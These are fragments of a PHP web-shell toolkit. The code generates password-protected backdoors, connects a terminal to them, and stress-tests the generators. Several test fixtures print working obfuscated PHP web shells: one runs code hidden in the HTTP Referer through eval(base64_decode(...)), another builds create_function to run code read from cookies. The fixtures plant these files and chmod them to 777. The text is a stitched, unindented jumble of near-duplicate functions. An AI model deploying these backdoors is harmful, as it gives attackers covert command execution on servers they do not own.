def main(arguments):
if arguments.command == 'generate':
obfuscated = generate.generate(password=arguments.password,
obfuscator=arguments.obfuscator,
agent=arguments.agent)
generate.save_generated(obfuscated, arguments.path)
log.info(
messages.generate.generated_backdoor_with_password_s_in_s_size_i %
(arguments.password, arguments.path, len(obfuscated)))
return
elif arguments.command == 'terminal':
session = SessionURL(url=arguments.url, password=arguments.password)
elif arguments.command == 'session':
session = SessionFile(arguments.path)
dlog.debug(pprint.pformat(session))
modules.load_modules(session)
if not arguments.cmd:
Terminal(session).cmdloop()
else:
Terminal(session).onecmd(arguments.cmd)
def setUpClass(cls):
if config.debug:
stream_handler.setLevel(logging.DEBUG)
else:
stream_handler.setLevel(logging.INFO)
cls._randomize_bd()
cls.password = '******'
# Check `config.script_folder` permissions
if (
subprocess.check_output(
config.cmd_env_stat_permissions_s % (config.script_folder),
shell=True).strip()
!= config.script_folder_expected_perms
):
raise DevException(
"Error: give to the http user full permissions to the folder \'%s\'"
% config.script_folder
)
obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>"""
tmp_handler, tmp_path = tempfile.mkstemp()
save_generated(obfuscated, tmp_path)
subprocess.check_call(
config.cmd_env_move_s_s % (tmp_path, cls.path),
shell=True)
subprocess.check_call(
config.cmd_env_chmod_s_s % ('777', cls.path),
shell=True)
def setUpClass(cls):
if config.debug:
stream_handler.setLevel(logging.DEBUG)
else:
stream_handler.setLevel(logging.CRITICAL)
cls._randomize_bd()
# Check `config.script_folder` permissions, comparing just the
# last 3 digits
if (subprocess.check_output(config.cmd_env_stat_permissions_s %
(config.script_folder),
shell=True).strip()[-3:] !=
config.script_folder_expected_perms[-3:]):
raise DevException(
"Error: give the required permissions to the folder \'%s\'" %
config.script_folder)
obfuscated = generate(cls.password)
tmp_handler, tmp_path = tempfile.mkstemp()
save_generated(obfuscated, tmp_path)
subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
shell=True)
subprocess.check_call(config.cmd_env_chmod_s_s % ('0777', cls.path),
shell=True)
def setUpClass(cls):
if config.debug:
stream_handler.setLevel(logging.DEBUG)
else:
stream_handler.setLevel(logging.INFO)
cls._randomize_bd()
cls.password = '******'
# Check `config.script_folder` permissions, comparing just the
# last 3 digits
if (subprocess.check_output(config.cmd_env_stat_permissions_s %
(config.script_folder),
shell=True).strip()[-3:] !=
config.script_folder_expected_perms[-3:]):
raise DevException(
"Error: give the required permissions to the folder \'%s\'" %
config.script_folder)
obfuscated = """<?php eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2FzJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGRhc2Q+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlfc2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L2Rhc2Q+Jzt9')); ?>"""
tmp_handler, tmp_path = tempfile.mkstemp()
save_generated(obfuscated, tmp_path)
subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
shell=True)
subprocess.check_call(config.cmd_env_chmod_s_s % ('0777', cls.path),
shell=True)
def setUpClass(cls):
if config.debug:
stream_handler.setLevel(logging.DEBUG)
else:
stream_handler.setLevel(logging.CRITICAL)
cls._randomize_bd()
# Check `config.script_folder` permissions
if (
subprocess.check_output(
config.cmd_env_stat_permissions_s % (config.script_folder),
shell=True).strip()
!= config.script_folder_expected_perms
):
raise DevException(
"Error: give to the http user full permissions to the folder \'%s\'"
% config.script_folder
)
obfuscated = generate(cls.password)
tmp_handler, tmp_path = tempfile.mkstemp()
save_generated(obfuscated, tmp_path)
subprocess.check_call(
config.cmd_env_move_s_s % (tmp_path, cls.path),
shell=True)
subprocess.check_call(
config.cmd_env_chmod_s_s % ('777', cls.path),
shell=True)
def setUpClass(cls):
if config.debug:
stream_handler.setLevel(logging.DEBUG)
else:
stream_handler.setLevel(logging.INFO)
cls._randomize_bd()
# Check `config.script_folder` permissions
if (subprocess.check_output(
config.cmd_env_stat_permissions_s % (config.script_folder),
shell=True).strip() != config.script_folder_expected_perms):
raise DevException(
"Error: give to the http user full permissions to the folder \'%s\'"
% config.script_folder)
obfuscated = generate(cls.password)
tmp_handler, tmp_path = tempfile.mkstemp()
save_generated(obfuscated, tmp_path)
subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
shell=True)
subprocess.check_call(config.cmd_env_chmod_s_s % ('777', cls.path),
shell=True)
def test_generators(self):
for i in range(0, 500):
self._randomize_bd()
obfuscated = generate(self.password)
save_generated(obfuscated, self.path)
self.channel = Channel(self.url, self.password, 'StegaRef')
self._clean_bd()
def test_generators(self):
for i in range(0, 500):
self._randomize_bd()
obfuscated = generate(self.password)
save_generated(obfuscated, self.path)
self.channel = Channel(self.url, self.password, 'StegaRef')
self._clean_bd()
def test_generators(self):
for i in range(0, 100):
self._randomize_bd()
obfuscated = generate(self.password)
save_generated(obfuscated, self.path)
self.channel = Channel('ObfPost', {
'url': self.url,
'password': self.password
})
self._incremental_requests(10, 100, 30, 50)
self._clean_bd()
def test_generators(self):
for i in range(0, 100):
self._randomize_bd()
obfuscated = generate(self.password)
save_generated(obfuscated, self.path)
self.channel = Channel(
'ObfPost',
{
'url' : self.url,
'password' : self.password
}
)
self._incremental_requests(10, 100, 30, 50)
self._clean_bd()
def setUpClass(cls):
if config.debug:
stream_handler.setLevel(logging.DEBUG)
else:
stream_handler.setLevel(logging.INFO)
cls._randomize_bd()
cls.password = '******'
# Check `config.script_folder` permissions, comparing just the
# last 3 digits
if (
subprocess.check_output(
config.cmd_env_stat_permissions_s % (config.script_folder),
shell=True).strip()[-3:]
!= config.script_folder_expected_perms[-3:]
):
raise DevException(
"Error: give the required permissions to the folder \'%s\'"
% config.script_folder
)
obfuscated = """<?php
$xcrd="mVwbeoGFjZShhceonJheSgnL1teXHc9XeoHeoNdLycsJy9ccy8nKSwgYXeoJyYXkeooJycsJysnKSwgam";
$dqlt="JGMeo9J2NvdW50JzskYT0kX0NPT0tJRTtpeoZihyZXNldCgkeoYSk9PSdhcycgJeoiYeogJGMoeoJGEpP";
$lspg="9pbihhcnJheeoV9zbeoGljZSgeokYeoSeowkYygkYSktMykpKSkpO2VeojaG8gJzwvJyeo4kay4nPic7fQ==";
$tylz="jMpeyRreoPeoSeodkYXeoNkJztlY2hvICc8Jy4kay4nPieoc7ZXZhbeoChiYXNlNjRfZGVjb2RlKHByZWdfeoc";
$toja = str_replace("z","","zsztr_zrzezpzlazce");
$apod = $toja("q", "", "qbaqsqeq6q4_qdecodqe");
$fyqt = $toja("uw","","uwcruweuwauwtuwe_funuwcuwtuwiouwn");
$sify = $fyqt('', $apod($toja("eo", "", $dqlt.$tylz.$xcrd.$lspg))); $sify();
?>"""
tmp_handler, tmp_path = tempfile.mkstemp()
save_generated(obfuscated, tmp_path)
subprocess.check_call(
config.cmd_env_move_s_s % (tmp_path, cls.path),
shell=True)
subprocess.check_call(
config.cmd_env_chmod_s_s % ('0777', cls.path),
shell=True)
def setUpClass(cls):
if config.debug:
stream_handler.setLevel(logging.DEBUG)
else:
stream_handler.setLevel(logging.INFO)
cls._randomize_bd()
cls.password = '******'
# Check `config.script_folder` permissions, comparing just the
# last 3 digits
if (subprocess.check_output(config.cmd_env_stat_permissions_s %
(config.script_folder),
shell=True).strip()[-3:] !=
config.script_folder_expected_perms[-3:]):
raise DevException(
"Error: give the required permissions to the folder \'%s\'" %
config.script_folder)
obfuscated = """<?php
$xcrd="mVwbeoGFjZShhceonJheSgnL1teXHc9XeoHeoNdLycsJy9ccy8nKSwgYXeoJyYXkeooJycsJysnKSwgam";
$dqlt="JGMeo9J2NvdW50JzskYT0kX0NPT0tJRTtpeoZihyZXNldCgkeoYSk9PSdhcycgJeoiYeogJGMoeoJGEpP";
$lspg="9pbihhcnJheeoV9zbeoGljZSgeokYeoSeowkYygkYSktMykpKSkpO2VeojaG8gJzwvJyeo4kay4nPic7fQ==";
$tylz="jMpeyRreoPeoSeodkYXeoNkJztlY2hvICc8Jy4kay4nPieoc7ZXZhbeoChiYXNlNjRfZGVjb2RlKHByZWdfeoc";
$toja = str_replace("z","","zsztr_zrzezpzlazce");
$apod = $toja("q", "", "qbaqsqeq6q4_qdecodqe");
$fyqt = $toja("uw","","uwcruweuwauwtuwe_funuwcuwtuwiouwn");
$sify = $fyqt('', $apod($toja("eo", "", $dqlt.$tylz.$xcrd.$lspg))); $sify();
?>"""
tmp_handler, tmp_path = tempfile.mkstemp()
save_generated(obfuscated, tmp_path)
subprocess.check_call(config.cmd_env_move_s_s % (tmp_path, cls.path),
shell=True)
subprocess.check_call(config.cmd_env_chmod_s_s % ('0777', cls.path),
shell=True)
def main(arguments):
if arguments.command == 'generate':
obfuscated = generate.generate(
password = arguments.password,
obfuscator = arguments.obfuscator,
agent = arguments.agent
)
generate.save_generated(obfuscated, arguments.path)
log.info(
messages.generate.generated_backdoor_with_password_s_in_s_size_i %
(arguments.path,
arguments.password, len(obfuscated))
)
return
elif arguments.command == 'terminal':
session = SessionURL(
url = arguments.url,
password = arguments.password
)
elif arguments.command == 'session':
session = SessionFile(arguments.path)
dlog.debug(
pprint.pformat(session)
)
modules.load_modules(session)
if not arguments.cmd:
Terminal(session).cmdloop()
else:
Terminal(session).onecmd(arguments.cmd)
def setUpClass(cls):
cls._randomize_bd()
obfuscated = generate(cls.password, agent='legacycookie_php')
save_generated(obfuscated, cls.path)
def setUpClass(cls):
cls._randomize_bd()
obfuscated = generate(cls.password, agent='stegaref_php_debug')
save_generated(obfuscated, cls.path)
def setUpClass(cls):
cls._randomize_bd()
obfuscated = generate(cls.password, agent='legacycookie_php')
save_generated(obfuscated, cls.path)
def setUpClass(cls):
cls._randomize_bd()
obfuscated = generate(cls.password, agent='stegaref_php_debug')
save_generated(obfuscated, cls.path)
